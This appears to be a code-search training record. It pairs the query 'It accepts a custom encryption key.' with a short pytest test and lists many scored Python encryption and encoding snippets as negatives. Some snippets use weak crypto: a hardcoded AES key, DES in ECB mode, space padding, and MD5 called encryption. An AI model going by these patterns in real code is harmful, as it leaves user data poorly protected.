"def encrypt(self, data):\n if not data:\n return ''\n data = self._pad_data(data)\n return self._crypt(data, self.ENCRYPT)", "async def encrypt(self, message: Message, jids: Optional[List[JID]], tab: ChatTabs):\n\n raise NotImplementedError", "def __encrypt(string: str) -> str:\n key = 171\n result = b\"\\0\\0\\0\" + chr(len(string)).encode('latin-1')\n for i in string.encode('latin-1'):\n a = key ^ i\n key = a\n result += chr(a).encode('latin-1')\n return result", "def encode(keyFile: str, string: str=\"\", inputFile: str=\"\", outputFile:str=\"\") -> str:\n print(\"Encoding message ...\")\n print(\"Is public key file ok ?\", checkKeyFile(keyFile,\"public\"))\n\n if (checkKeyFile(keyFile,\"public\")): \n f = open(keyFile)\n keyData = extractParamsFromKey(f.readlines()[1]) # read the second line of the file and extract the param\n if args.verbose : print(\"keydata (publ) :\", keyData)\n \n #open a file if the string is empty\n if(string == \"\"):\n string = str(readFile(inputFile))\n else:\n string = string\n\n # transform the ascii string into a series of numbers\n asciiToInt = \"\"\n for char in string :\n asciiToInt += str(ord(char)).zfill(3)\n if args.verbose : print(\"ascii to int\", asciiToInt)\n\n # calculate the block length\n blocklen = 
len(str(keyData[0])) -1\n if args.verbose : print(\"block size is\", blocklen)\n \n # split the string into blocks\n # start bu reversing the string so we can start left to right\n tmp = asciiToInt[::-1]\n # cut them\n blocks = wrap(tmp, blocklen)\n # reverse the lsit of cut\n blocks.reverse()\n # inside eecaht cut reserve the characters\n for i in range(len(blocks)):\n blocks[i] = blocks[i][::-1]\n if args.verbose : print(blocks)\n \n # make sur that every block is the corect length, overwise add padding\n for i in range(len(blocks)):\n blocks[i] = blocks[i].zfill(blocklen)\n if args.verbose : print(\"blocks after padding :\", blocks)\n \n # crypt everyblock\n tempCryptString = \"\"\n if args.verbose : print(\"encrypted blocks:\")\n for i in range(len(blocks)): \n blockEncrypted = str(calculateCrypt(blocks[i], keyData[1], keyData[0]))\n if args.verbose : print(blockEncrypted)\n blockEncrypted = blockEncrypted.zfill(blocklen+1)\n if args.verbose : print(blockEncrypted)\n tempCryptString += blockEncrypted\n if args.verbose : print(\"encrypted string :\",tempCryptString)\n \n # write the contentes to a file\n hexstr = intToHexToBase64(tempCryptString)\n if(outputFile == \"\"):\n print(\"Encrypted :\")\n print(hexstr)\n else :\n print(\"writing to file\", outputFile)\n writeToFile(outputFile, hexstr)\n return hexstr\n else: \n print(\"keyfile is incorrect\")\n return", "def encode(encryption=None):\n\n key_to_encrypt = {'a': 'q', 'b': 'v', 'c': 'x', 'd': 'z', 'e': 'y', 'f': 'w', 'g': 'u', 'h': 't', 'i': 's',\n 'j': 'r',\n 'k': 'p', 'l': 'o', 'm': 'n', 'n': 'm', 'o': 'l', 'p': 'k', 'r': 'j', 's': 'i', 't': 'h',\n 'u': 'g', 'w': 'f',\n 'y': 'e', 'z': 'd', 'x': 'c', 'v': 'b', 'q': 'a',\n 'A': 'Q', 'B': 'V', 'C': 'X', 'D': 'Z', 'E': 'Y', 'F': 'W', 'G': 'U', 'H': 'T', 'I': 'S',\n 'J': 'R', 'K': 'P',\n 'L': 'O', 'M': 'N', 'N': 'M', 'O': 'L', 'P': 'K', 'R': 'J', 'S': 'I', 'T': 'H', 'U': 'G',\n 'W': 'F', 'Y': 'E',\n 'Z': 'D', 'X': 'C', 'V': 'B', 'Q': 'S',\n '1': '5', '2': '9', '3': '8', '4': '7', '5': '6', '6': '4', '7': '3', '8': '2', '9': '1',\n '.': ',', ',': '.', ':': ';', ';': ':', '?': '!', '!': '?', '-': '_', '_': '-', '(': ')',\n ')': '(',\n '%': '$', '$': '%', ' ': '&', '&': ' ', '+': '*', '*': '+'}\n entered_image = input(\"Image name with extension: \")\n img = Image.open(entered_image, 'r')\n\n message = input(\"Message that you want to be encoded: \")\n if (len(message) == 0):\n raise ValueError('Empty message!')\n\n e1 = monoalphabetic_encryption.Encryption(key_to_encrypt, message)\n encrypted_message = e1.encrypt()\n\n new_image = img.copy()\n putPixel(new_image, encrypted_message)\n\n new_image_name = input(\"New image name with extension: \")\n new_image.save(new_image_name, str(new_image_name.split(\".\")[1].upper()))", "def _url_base64_encode(msg):\r\n msg_base64 = base64.b64encode(msg)\r\n msg_base64 = msg_base64.replace('+', '-')\r\n msg_base64 = msg_base64.replace('=', '_')\r\n msg_base64 = msg_base64.replace('/', '~')\r\n return msg_base64", "def _encode_message(message):\n aes_key = get_settings()['aes_key'].encode('utf-8')\n hmac_key = get_settings()['hmac_key'].encode('utf-8')\n\n pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(\n AES.block_size - len(s) % AES.block_size)\n init_vector = Random.new().read(AES.block_size)\n cipher = AES.new(aes_key, AES.MODE_CBC, init_vector)\n padded_message = pad(message)\n aes_message = init_vector + cipher.encrypt(padded_message)\n hmac_digest = hmac.new(bytes(hmac_key), bytes(aes_message), hashlib.sha1)\n\n return 
aes_message, hmac_digest", "def aes_encrypt(self, buff):\n start = time.time()\n message = buff.encode()\n raw = pad(message)\n cipher = AES.new(\"DESCRYPTDESCRYPT\", AES.MODE_CBC, iv())\n enc = cipher.encrypt(raw)\n end = time.time()\n print \"Encrypt time: {0:.10f}\".format((end - start))\n return base64.b64encode(enc).decode('utf-8')", "def base64(s):\n return b64encode(s,'[]').replace('=','_')", "def encrypt(self, plaintext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def AES_encrypt(content: Text) -> bytes:\n cipher = AES.new(secret_key, mode, IV)\n body = Padding.pad(content.encode('utf-8'), bs)\n return b64encode(cipher.encrypt(body))", "def encrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"encrypt.php\",msg)) as f:\n encryptedmessage = f.read().decode('utf-8',\"strict\")\n return encryptedmessage", "def encrypt(self, message):\n return str.translate(message, self._encoder)", "def encrypt(self):\n # Generate a randomized initialization vector\n iv = Random.new().read(AES.block_size)\n # Create a new AES object in Cipher Block Chaining mode\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n # Add a buffer so that the plaintext is a multiple of 16 characters in length\n pt_len = len(self.plaintext)\n buffer_size = AES.block_size - pt_len % AES.block_size\n strmsg = self.plaintext + \" \" * buffer_size\n return cipher.encrypt(str.encode(strmsg)), iv", "def test_kms_encrypt_returns_b64(self):\n encrypted_secret = ef_utils.kms_encrypt(self.mock_kms, self.service, self.env, self.secret)\n b64_return = base64.b64encode(self.bytes_return)\n self.assertEqual(b64_return, encrypted_secret)", "def encodeMessage(self, key, message):\n # Make sure pure ascii, and replace bullshit\n message = message.encode('ascii', 'replace')\n # Any message needs to be a multiple of 8.\n dsize = len(message)\n #message = struct.pack('!q', int(binascii.crc32(message)& 0xffffffff)) + struct.pack('!q', dsize) + message\n # Encode two dsize parity blocks and check them against eachother on the receiving end\n message = struct.pack('!q', dsize) + struct.pack('!q', dsize) + message\n key = self.createKey(key)\n short = (math.ceil(len(message)/8.0) * 8) - len(message)\n space = \"\\x00\" * int(short)\n enc = DES.new(key, DES.MODE_ECB)\n return enc.encrypt(message+space)", "def demonstrate_string_encryption_key_based(plain_text):\n try:\n # GENERATE key\n key = AESGCM.generate_key(bit_length=256)\n\n # GENERATE random nonce (number used once)\n nonce = os.urandom(12)\n\n # ENCRYPTION\n aesgcm = AESGCM(key)\n cipher_text_bytes = aesgcm.encrypt(\n nonce=nonce,\n data=plain_text.encode('utf-8'),\n associated_data=None\n )\n # CONVERSION of raw bytes to BASE64 representation\n cipher_text = base64.urlsafe_b64encode(cipher_text_bytes)\n\n # DECRYPTION\n decrypted_cipher_text_bytes = aesgcm.decrypt(\n nonce=nonce,\n data=base64.urlsafe_b64decode(cipher_text),\n associated_data=None\n )\n decrypted_cipher_text = decrypted_cipher_text_bytes.decode('utf-8')\n\n logger.info(\"Decrypted and original plain text are the same: %s\",\n decrypted_cipher_text == plain_text)\n except InvalidTag:\n logger.exception(\"Symmetric string encryption failed\")", "def _encrypt_aes_key(aes_key: bytes, receiver_public_key: RsaKey) -> bytes:\n cipher_rsa = PKCS1_OAEP.new(receiver_public_key)\n return cipher_rsa.encrypt(aes_key)", "def fernet_encript(key,message):\n\tf = Fernet(key)\n\treturn f.encrypt(message)", "def encode(text: str) -> str:\n b: bytes = text.encode()\n encoded: bytes = base64.b64encode(b)\n 
return encoded.decode()", "def encrypt_message(self):\r\n\t\t#Will not let user input useless messages that cannot be encrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to encrypt. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\tself.setup_key_encrypt()\r\n\t\tmy_code = Encryptor(self.message, self.key)\r\n\t\tprint(my_code.transfer_encrypt()+ \"|\")", "def encrypt(event=None): # event is passed by binders.\n msg = inputText.get(\"1.0\",tkinter.END)\n outText.delete('1.0', tkinter.END)\n\n f = open(myTmpDir + 'pt' + str(identity) + '.bin','wb')\n f.write(msg)\n f.close()\n\n os.popen(\"rsa.exe e \" + myTmpDir + \"pt\" + str(identity) + \".bin \"+ myTmpDir + \"locEnc\" + str(identity) + \".bin\")\n\n locEncFileName = myTmpDir + \"locEnc\" + str(identity) + \".bin\"\n with open(locEncFileName, \"rb\") as f:\n readFile = f.read()\n # Convert to hex representation\n digest = base64.encodestring(bytes(readFile))\n\n # TODO: overwirite\n outText.insert(tkinter.END, digest)", "def encode_data(data):\n bytes = json.dumps(data).encode('utf-8').encode('base64').replace('\\n', '')\n assert len(bytes) < 250 * 1024\n return bytes", "def encode_base64(self, i):\n return base64.b64encode(struct.pack('!L', self.transcode(i)), self.extra_chars)[:6]", "def encrypt(self, str_msg):\n msg = str_msg.encode('utf-8')\n if self.security_type == gss.RequirementFlag.integrity:\n return gss.wrap(self.ctx, msg, False, None)[0]\n elif self.security_type == gss.RequirementFlag.confidentiality:\n res, used = gss.wrap(self.ctx, msg, True, None)\n if not used:\n raise GSSClientError('User requested encryption, '\n 'but it was not used!')\n return res\n else:\n return msg", "def encode(self):\n return base64.b64encode(self.content).decode('ascii')", "def text(message):\n room = session.get('room')\n key = os.urandom(32)\n iv = os.urandom(16)\n print(key,iv)\n\n print(key[:2],key[:4])\n print(len(key),len(iv))\n print(type(key))\n data = 'hello world 1234' # <- 16 bytes\n\n enc = aes_encrypt(key,data,iv)\n dec = aes_decrypt(key,enc,iv)\n\n print('data:',data)\n print('cipher:', enc)\n print('plain:',dec)\n test = os.urandom(2)\n print('key:', int.from_bytes(test, byteorder='little'))\n print('key', test)\n \n emit('enc_msg', {'key': key.hex(),\n 'cipher': enc.hex(),\n 'iv' : iv.hex(),\n }, room=room)\n emit('message', {'msg': session.get('name') + ':' + message['msg']}, room=room)", "def encrypt(*args, **kwargs) -> str:\n key = pad(settings.PTRACK_SECRET).encode('utf8')\n box = nacl.secret.SecretBox(key)\n nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n\n data = json.dumps((args, kwargs))\n # box expects bytes, so we convert here\n bytes_data = data.encode('utf8')\n encrypted = box.encrypt(bytes_data, nonce)\n encoded_data = base64.urlsafe_b64encode(encrypted)\n return encoded_data.decode('utf8')", "def true_send(conn, data):\n encrypted_data = key.encrypt(pickle.dumps(data))\n length = str(len(encrypted_data)).zfill(LENGTH).encode()\n data = length + encrypted_data\n conn.send(data)", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def encrypt(self, message):\n message = self._padding(message, self._block_size)\n initialization_vector = Random.new().read(self._block_size)\n cipher = AES.new(self._key, AES.MODE_CBC, initialization_vector)\n return base64.b64encode(initialization_vector +\n cipher.encrypt(message))", "def 
base64_encoder(cls, text, encoding: str = 'utf-8', base64_encoding_map='default') -> str:\n\t\tBASE64MAP = cls.BASE64MAP_dict.get(base64_encoding_map)\n\t\tif not BASE64MAP:\n\t\t\traise ValueError('Invalid base64_encoding_map: only [\"default\", \"RFC3501\", \"RFC4648\"] are allowed')\n\t\ttext_encoded = text.encode(encoding) if type(text) is str else text\n\t\tstr_encoded = ''\n\t\ttext_in_block_of_three = (\n\t\t\t''.join([bin(character).lstrip('0b').zfill(8) for character in text_encoded[i: i + 3]])\n\t\t\tfor i in range(0, len(text_encoded), 3))\n\t\ttext_in_base64_block = (['00' + block[index:index + 6] for index in range(0, 24, 6)] for block in\n\t\t\t\t\t\t\t\ttext_in_block_of_three)\n\t\tfor b64block in text_in_base64_block:\n\t\t\tfor character in b64block:\n\t\t\t\tc_length = len(character)\n\n\t\t\t\tif c_length == 6:\n\t\t\t\t\tcharacter += '00'\n\t\t\t\telif c_length == 4:\n\t\t\t\t\tcharacter += '0000'\n\t\t\t\telif c_length == 2:\n\t\t\t\t\tcharacter += '01' + '0' * 6\n\n\t\t\t\tcharacterToAppend = BASE64MAP[int(character, base=2)]\n\t\t\t\tif characterToAppend == '=' and base64_encoding_map == 'RFC3501':\n\t\t\t\t\tcharacterToAppend = ''\n\t\t\t\tstr_encoded += characterToAppend\n\n\t\treturn str_encoded", "def encrypt_data(self, params):\n raise NotImplementedError", "def encrypt(string,pub):\r\n string = livingDead.utfE(string)\r\n crypto = rsa.encrypt(string, pub)\r\n return crypto", "def _encrypted_user_photo_key_str(self):\r\n face_aes_key_str = settings.VERIFY_STUDENT[\"SOFTWARE_SECURE\"][\"FACE_IMAGE_AES_KEY\"]\r\n face_aes_key = face_aes_key_str.decode(\"hex\")\r\n rsa_key_str = settings.VERIFY_STUDENT[\"SOFTWARE_SECURE\"][\"RSA_PUBLIC_KEY\"]\r\n rsa_encrypted_face_aes_key = rsa_encrypt(face_aes_key, rsa_key_str)\r\n\r\n return rsa_encrypted_face_aes_key.encode(\"base64\")", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def encode(plain):\n # Remove whitespace and punctionation\n encoded = remove_punctuation(plain.lower())\n encoded = remove_whitespace(encoded)\n \n # Add space after every 5 characters\n encoded = add_space(encoded, 5)\n \n # Use the cipher translation\n encoded = encoded.translate(cipher)\n \n return encoded", "def _EncryptData(self, data):\n if isinstance(data, str):\n data = data.encode('utf-8')\n encrypted_data = self._gpg.encrypt(\n data,\n self.args.target_key,\n sign=self._gpg.list_keys(True)[0]['fingerprint'],\n always_trust=False)\n if not encrypted_data.ok:\n raise Exception('Failed to encrypt data! 
Log: %s' % encrypted_data.stderr)\n return encrypted_data.data", "def __encryptRSA(msg, key):\n # Convert message to bytes\n msg = msg.encode('utf-8')\n return key.encrypt(\n msg,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )", "def b64encode(s: str) -> str:\n return base64.b64encode(s.encode()).decode()", "def get_Base64(self):\n\n return base64_with_linebreaks(self.get_DER())", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def b64_json_enc(data):\n json_str = json.dumps(data)\n return base64.b64encode(json_str.encode()).decode()", "def _encode_base64pad(data: str) -> str:\n pattern = r\"[^a-zA-Z0-9\\+]\"\n regex = re.compile(pattern)\n while True:\n ebytes = base64.b64encode(data.encode(\"utf-8\"))\n estring = str(ebytes, \"utf-8\")\n if not regex.findall(estring):\n break\n # Pad with trailing space and try again to eliminate base64 pad chars\n data = data + \" \"\n\n return estring", "def encrypt(self, plaintext: str) -> str:\n\n return self.run(plaintext, Cryptography.ENCRYPT)", "def encrypt(lines:list, data:bytes):\n\n # TODO make ckeck of text length\n lines_index = 0\n if len(lines) < len(data)*8: # raise Error, if text are too short\n raise RuntimeError(\"Error: Text too short to encrypt message\")\n\n for bit in iterate_bits(data):\n if bit:\n lines[lines_index] += \" \"\n lines_index += 1\n return \"\\n\".join(lines)", "def encode(message, cipher):\n return message.translate(str.maketrans(letters, ''.join(cipher)))", "def encrypt(self, message):\n output = []\n for letter in message:\n # preventing white spaces and numbers\n if letter == ' ' or isinstance(letter, int):\n output.append(letter)\n else:\n idx_in_plain = self.PLAIN_TEXT_ALPH.index(letter.upper())\n output.append(self.CIPHER_TEXT_ALPH[idx_in_plain])\n return \"\".join(output)", "def base64_encode_string(string):\n # type: (str or bytes) -> str\n if on_python2():\n return base64.b64encode(string)\n else:\n return str(base64.b64encode(string), 'ascii')", "def encrypt(self, key, plaintext):\n output = []\n padded_key = padd_key(key, plaintext)\n for i in range(len(plaintext)):\n enc_ascii = (ord(plaintext[i]) + ord(padded_key[i])) % 256\n output.append(chr(enc_ascii))\n return ''.join(output)", "def rsa_encrypt(message, publickey):\r\n \r\n # A key object is created to interact with the PyCrypto\r\n # encryption suite. 
The object contains key data and\r\n # the necessary rsa functions.\r\n temp_key_obj = _rsa_keydict_to_keyobj(publickey)\r\n \r\n return _rsa_chopstring(message, temp_key_obj, temp_key_obj.encrypt)", "def encrypt_message(message: bytes, receiver_public_key: RsaKey, nbits: int = 256) -> bytes:\n aes_key = get_random_bytes(nbits // 8)\n cipher_aes = AES.new(aes_key, AES.MODE_CBC)\n return cipher_aes.iv + _encrypt_aes_key(aes_key, receiver_public_key) + cipher_aes.encrypt(\n pad(message, AES.block_size)) # Padding have to be added in case the size does not fit in exact blocks", "def encrypt(self, request):\n try:\n data = request.get_json()\n if not data:\n return make_response(util.create_response(status=\"error\", message=\"Request Body Empty\"), 400)\n if not data.get(\"input\") :\n return make_response(util.create_response(status=\"error\", message=\"Input String Empty\"), 400)\n\n input = data.get('input')\n output = base64.b64encode(input.encode(\"utf-8\")).decode('utf-8')\n return util.create_response(input=input,output=output)\n except Exception as e:\n return make_response(util.create_response(status=\"error\", message=\"Something Went Wrong.\"), 500)", "def encrypt(self, message, key):\n return self.translateMessage(message, key, \"encrypt\")", "def encrypt_data ( aes_key, data ) :\n salt = Crypto.Random.new( ).read( Crypto.Cipher.AES.block_size )\n cipher = Crypto.Cipher.AES.new( aes_key, Crypto.Cipher.AES.MODE_CFB, salt )\n encrypted_data = cipher.encrypt( data )\n\n return encode_data( salt + encrypted_data )" ]
[ "0.69580686", "0.69413096", "0.6922633", "0.68996924", "0.67965823", "0.6779057", "0.677835", "0.6773155", "0.67529523", "0.67321116", "0.6706291", "0.6699885", "0.66843873", "0.66808355", "0.66681325", "0.6639239", "0.6632102", "0.6602281", "0.6573491", "0.65729386", "0.6543288", "0.65344155", "0.653406", "0.65135497", "0.6511423", "0.64902115", "0.64781266", "0.64745337", "0.6464599", "0.6452452", "0.6422842", "0.6419679", "0.6410992", "0.6401015", "0.63963306", "0.63961613", "0.63933146", "0.6391078", "0.6360968", "0.63047314", "0.63020647", "0.6300612", "0.6297058", "0.62825906", "0.6278497", "0.62735313", "0.626222", "0.62569064", "0.6251571", "0.6244685", "0.6244344", "0.6240783", "0.62384135", "0.6235787", "0.62224203", "0.6208466", "0.6201878", "0.6193141", "0.6128357", "0.6126886", "0.6125921", "0.6122591", "0.6107153", "0.60977167", "0.6086222", "0.6081018", "0.6054823", "0.6046643", "0.60433215", "0.6042291", "0.6036536", "0.60336787", "0.60324806", "0.60265523", "0.60252285", "0.60116273", "0.60030174", "0.5999718", "0.5994576", "0.5991087", "0.599042", "0.59870183", "0.59775174", "0.59761864", "0.5972601", "0.59716165", "0.59716165", "0.5969353", "0.5963334", "0.5961923", "0.596164", "0.59608847", "0.5959927", "0.59586895", "0.59495705", "0.5948784", "0.5941547", "0.5940348", "0.5935805", "0.5933189" ]
0.6409957
33
It accepts a custom encryption key.
def test_encrypt_key(self): encrypted = encrypt('message', key=b'0' * 32) assert encrypted assert encrypted != 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:\n ...", "def set_encryption(key):\n global_scope['enc'] = Encryption(key.encode())", "def encryption_key(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"encryption_key\")", "def encryption_key(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"encryption_key\")", "def _encode_key(self, key: str) -> str:\n return key", "def create_key ():", "def _encrypt_aes_key(aes_key: bytes, receiver_public_key: RsaKey) -> bytes:\n cipher_rsa = PKCS1_OAEP.new(receiver_public_key)\n return cipher_rsa.encrypt(aes_key)", "def prepare_key(self, key):\n return smart_str(key)", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def key(self, value=None):\n if self.crypt_method == 'C':\n key_type = \"number\"\n else:\n key_type = \"string\"\n\n input_message = f\"Please enter a {key_type} as a \" \\\n f\"{self.crypt_type}ion key\\n>> \"\n if value is None:\n key = input(input_message)\n else:\n key = value\n\n is_valid_key, key = Check.is_valid_key(key, self.crypt_method)\n if is_valid_key:\n self._key = key\n else:\n raise ValueError(f\"Key{key} is invalid\")", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def _encode_key(self, key):\n return key.encode() if isinstance(key, str) else key", "def load_key(self, key, key_type, key_encoding):\n if key_type is not EncryptionKeyType.SYMMETRIC:\n raise ValueError(\n 'Invalid key type \"{key_type}\" for cipher \"{cipher}\"'.format(key_type=key_type, cipher=self.java_name)\n )\n\n if key_encoding is not KeyEncodingType.RAW:\n raise ValueError(\n 'Invalid key encoding \"{key_encoding}\" for cipher \"{cipher}\"'.format(\n key_encoding=key_encoding, cipher=self.java_name\n )\n )\n\n return key", "def _newKey(self, key):\n pass", "def __init__(__self__, *,\n kms_encryption_config: pulumi.Input['FhirDatastoreKmsEncryptionConfigArgs']):\n pulumi.set(__self__, \"kms_encryption_config\", kms_encryption_config)", "def test_encrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = None\n\n with pytest.raises(EncryptionError):\n encrypt('message')", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. 
--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def add_key(mu_key):\n params['key'] = mu_key", "def key_encryption_key(self) -> Optional[pulumi.Input['KeyVaultAndKeyReferenceArgs']]:\n return pulumi.get(self, \"key_encryption_key\")", "def handle_key(self, key):\n pass", "def key(key):\n return key", "def _GetKeyString(self):", "def _GetKeyString(self):", "def __init__(__self__, *,\n key_encryption_key_identity: Optional[pulumi.Input['ClusterPropertiesKeyEncryptionKeyIdentityArgs']] = None,\n key_encryption_key_url: Optional[pulumi.Input[str]] = None):\n if key_encryption_key_identity is not None:\n pulumi.set(__self__, \"key_encryption_key_identity\", key_encryption_key_identity)\n if key_encryption_key_url is not None:\n pulumi.set(__self__, \"key_encryption_key_url\", key_encryption_key_url)", "def key():\n pass", "def key():\n pass", "def aes_key_wrap(self, kek: bytes, key_to_wrap: bytes) -> bytes:\n return keywrap.aes_key_wrap(kek, key_to_wrap, default_backend())", "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def private_key(self):", "def key_upload(self, key=None):\n raise NotImplementedError", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def wrap(self, key:bytes, credential:PublicKeyCredentialSource)->bytes:\n return keywrap.aes_key_wrap_with_padding(key,credential.get_bytes(True),default_backend())", "def main():\n key, plain = get_key_plain()\n encode(key, plain)", "def load_key():", "def aes_encrypt(data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = pad(data)\r\n return cipher.encrypt(padded_data)", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def make_external_key(self, data):\n return data['key']", "def __init__(self, key: bytearray):\n self.__key = key\n self.__KSA(bytearray([i for i in range(256)]))", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def load_key(self, key):\n self.key = key", "def _encrypt_data_key(self, data_key, algorithm, encryption_context):\n # Raw key string to EncryptedData\n encrypted_wrapped_key = self.config.wrapping_key.encrypt(\n plaintext_data_key=data_key.data_key, encryption_context=encryption_context\n )\n # EncryptedData to EncryptedDataKey\n return 
aws_encryption_sdk.internal.formatting.serialize.serialize_wrapped_key(\n key_provider=self.key_provider,\n wrapping_algorithm=self.config.wrapping_key.wrapping_algorithm,\n wrapping_key_id=self.key_id,\n encrypted_wrapped_key=encrypted_wrapped_key,\n )", "def encrypt(key, plaintext, cipher):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n p = plaintext.read()\n c = rsa.encrypt(p, k)\n\n cipher.write(c)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except OverflowError:\n click.echo(\"ERROR: Message is to long for encryption with the given key.\")", "def key():", "def encrypt(self, message, key):\n return self.translateMessage(message, key, \"encrypt\")", "def encryption_key(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"encryption_key\")", "def __init__(__self__, *,\n disk_encryption_key: Optional[pulumi.Input['KeyVaultAndSecretReferenceArgs']] = None,\n key_encryption_key: Optional[pulumi.Input['KeyVaultAndKeyReferenceArgs']] = None):\n if disk_encryption_key is not None:\n pulumi.set(__self__, \"disk_encryption_key\", disk_encryption_key)\n if key_encryption_key is not None:\n pulumi.set(__self__, \"key_encryption_key\", key_encryption_key)", "def get_key(self, key_value):\n # Storing the correct key value back to the self.key attributes.\n self.key=key_value\n self.cryptor=Fernet(self.key)", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def MakeKey(self, string, string_1, string_2):\n ...", "def __init__(self, key=None):\n\n self.key = key\n self.cryptor = None\n self.file_ext_targets = ['txt']", "def __encryptionresolver__(pk, rk, property_name):\n pass", "def md5_encrypt(self, key):\n # instantiate the md5 object in hashlib module\n md5_object = hashlib.md5()\n # encrypt the key\n md5_object.update(key)\n # return the encrypted key\n encrypted_key = md5_object.hexdigest()\n return encrypted_key", "def from_key(self, public_id, key):\n otp = self.get_otp(key)\n from_key = modhex_encode(public_id.encode('hex')) + modhex_encode(otp.encode('hex'))\n return from_key", "def _get_raw_key(self, key_id):", "def parse_key(self, key):\r\n if not key:\r\n self.aes = None # empty key == no encryption\r\n return self.parse_string(self.tmp) # must return size (see the next return)\r\n key.decode() # test availability\r\n size = len(key)\r\n for padding in (16, 24, 32): # fixed key size\r\n if size <= padding:\r\n break\r\n key += chr(0) * (padding - size)\r\n self.aes = AES.new(key)\r\n return self.parse_string(self.tmp) # if key changes you must update string\r", "def _disabled_encrypt(self, *args, **kwargs):\n raise NotImplementedError('\"encrypt\" is not supported by the \"{}\" algorithm'.format(self.java_name))", "def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:\n return jsii.get(self, \"encryptionKey\")", "def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:\n return jsii.get(self, \"encryptionKey\")", "def public_key(self):", "def InvocationAddEncKey(builder, encKey):\n return AddEncKey(builder, encKey)", "def _get_encryption_key(self, **options):\n\n raise CoreNotImplementedError()", "def key_encryption_key_identity(self) -> Optional[pulumi.Input['ClusterPropertiesKeyEncryptionKeyIdentityArgs']]:\n return pulumi.get(self, \"key_encryption_key_identity\")", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n 
self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def encrypt_key(data, key):\n data = MegaCrypto.base64_decode(data)\n return sum((MegaCrypto.str_to_a32(MegaCrypto.cbc_encrypt(data[_i:_i + 16], key))\n for _i in range(0, len(data), 16)), ())", "def generate_encrypted_key(key, encryption_key):\n pub_enc_key = RSA.importKey(encryption_key)\n # RSA encryption protocol according to PKCS#1 OAEP\n cipher = PKCS1_OAEP.new(pub_enc_key)\n return cipher.encrypt(key)", "def test_encryption_public_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.encrypt_data(given))", "def addkey(unsafe_import_key):\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n if not unlock_wallet(stm):\n return\n if not unsafe_import_key:\n unsafe_import_key = click.prompt(\"Enter private key\", confirmation_prompt=False, hide_input=True)\n 